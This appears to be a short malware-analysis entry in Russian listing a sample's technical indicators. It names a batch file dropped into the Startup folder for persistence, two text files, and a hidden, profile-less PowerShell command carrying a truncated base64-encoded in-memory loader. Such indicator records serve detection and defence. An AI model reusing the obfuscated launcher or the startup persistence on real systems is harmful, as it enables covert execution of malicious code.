Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\System.bat
- %HOMEPATH%\My Documents\vinamilk.txt
- %HOMEPATH%\My Documents\PATH.txt
- '<SYSTEM32>\cmd.exe' /Q /C powershell.exe -nop -w hidden -enc JABEAEUASAB0AEkARwBXACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMA...
- '<SYSTEM32>\notepad.exe' %HOMEPATH%\My Documents/vinamilk.txt